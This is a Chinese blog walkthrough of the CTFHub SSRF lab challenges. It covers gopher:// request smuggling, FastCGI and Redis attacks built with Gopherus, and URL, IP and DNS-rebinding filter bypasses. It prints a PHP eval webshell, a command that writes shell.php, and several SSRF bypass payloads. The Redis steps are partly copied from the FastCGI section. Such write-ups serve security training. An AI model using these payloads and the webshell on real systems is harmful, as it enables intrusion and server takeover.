CTFHub-SSRF解析合集

内网访问

直接使用 http:// 访问内网获取flag数据

伪协议读取文件

使用 file://绝对路径 读取flag.php数据,需要查看网页源代码

使用 file://绝对路径 读取flag.php数据,需要查看网页源代码

端口扫描

1.打开靶场后访问随机一个端口,抓包

2.将抓到的包发送到攻击模块,选择攻击的参数并修改设置,

注:本题提示端口范围在8000到9000

以修改请求间隔或少量多次的爆破,防止脆弱的靶场崩溃

3.爆破完后点击按长度排列,寻找长度不同的数据包,得知端口号后访问获取flag

post提交

1.寻找注入点

2.访问源代码

3.输入 key 抓包

4.删除无用数据,并修改host为127.0.0.1,复制并编码

5.将%0A替换为%0D%0A,末尾添加%0D%0A,代表数据包结束

6.二次编码

7.返回靶场在 ?url= 后访问添加 gopher://127.0.0.1:80/_二次编码后的数据包,获取ctf

上传文件

1.访问本地的flag.php

2.发现只有选择文件,需要自己添加提交按钮

<input type="file" name="file">

3.选择并提交文件,抓包

4.出现乱码,发送到重放器,删除几个乱码,查看字节长度是否改变,若改变,则正常使用

5.删除无用数据,修改host为 127.0.0.1 ,并将剩余数据进行编码

6.将编码后的数据中的%0A切换为%0D%0A,并在末尾添加%0D%0A代表数据包结束

7.将替换后的数据二次编码

8.使用 gopher://127.0.0.1:80/_二次编码数据 获取flag

FastCGI 协议

1.打开靶场和kali,在kali上打开 Gopherus-master 工具运行, 由于题目为 fastcgi 协议,所以指定 fastcgi, 提交一个靶场内的php文件地址,建议为默认的 index.php ,输入一句话木马,生成payload

运行代码: python2 gopherus.py --exploit fastcgi

地址: /var/www/html/index.php

一句话木马: <?php @eval($_POST['cmd']);?>

# base64编码后

echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > shell.php

2.将获取的 payload 编码

3.将编码后的数据输入到靶场,注入木马,并检查是否成功

注:未报错,添加成功

4.使用中国菜刀工具查询ctf

右键添加

Redis 协议

1.打开靶场和kali,在kali上打开 Gopherus-master 工具运行, 由于题目为 fastcgi 协议,所以指定 fastcgi, 提交一个靶场内的php文件地址,建议为默认的 index.php ,输入一句话木马,生成payload

运行代码: python2 gopherus.py --exploit redis

地址: /var/www/html/index.php

一句话木马: <?php @eval($_POST['cmd']);?>

2.将获取的 payload 编码

3.将编码后的数据输入到靶场,注入木马,并检查是否成功

虽然一直处于加载状态,但木马已经植入

注:未报错,添加成功

4.使用中国菜刀工具查询ctf

右键添加

URL BYpass

正常搜索应该为http://127.0.0.1/flag.php,但本题要求必须以 http://notfound.ctfhub.com 开头,所以结合起来为 ?url=http://notfound.ctfhub.com/127.0.0.1/flag.php 显然无法访问成功,所以可以将127前的 / 换为@ ,?url=http://notfound.ctfhub.com@127.0.0.1/flag.php,这样就可以将网址解析为以notfound.ctfhub.com的账户去访问127.0.0.1/flag.php

访问成功,获得flag

数字 IP BYpass

1.按流程访问,发现网站将127与172都屏蔽了.

2.此处有两种解决方案

  1. 将127.0.0.1替换为十六进制-->7F000001

注: . 转换为0,其他数字正常转换,最后拼接到一起

在十六进制前加0x可将十六进制解析为十进制

  1. 使用localhost替换127.0.0.1

302 跳转 BYpass

本题与上一题基本一致,上一题是将127和172屏蔽了无法使用,本题是添加了302跳转协议,一旦接收到IP地址就会跳转,也相当于变相禁用了127与172,故解法遇上题一样有两种,转换十六进制与使用 localhost

DNS 重绑定 BYpass

本题需要使用 DNS 重绑定,使用在线 DNS 重绑定网站获取重绑定代码,替换127.0.0.1,即可获得flag

https://lock.cmpxchg8b.com/rebinder.html

  • 12
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHub是一个CTF(Capture The Flag)比赛平台,提供了各种安全挑战和漏洞利用的题目。在引用\[1\]中提到了一些与SSRF(Server-Side Request Forgery)相关的内容,包括伪协议读取文件、端口扫描、POST请求上传文件、FastCGI、Redis协议、URL Bypass、数字IP Bypass、302跳转Bypass和DNS重绑定 Bypass。引用\[2\]中提到了CGI和FastCGI协议的运行原理,并介绍了使用Gopherus工具生成攻击FastCGI的payload。引用\[3\]中提到了一个使用Python脚本进行端口扫描的例子。 所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHub—SSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值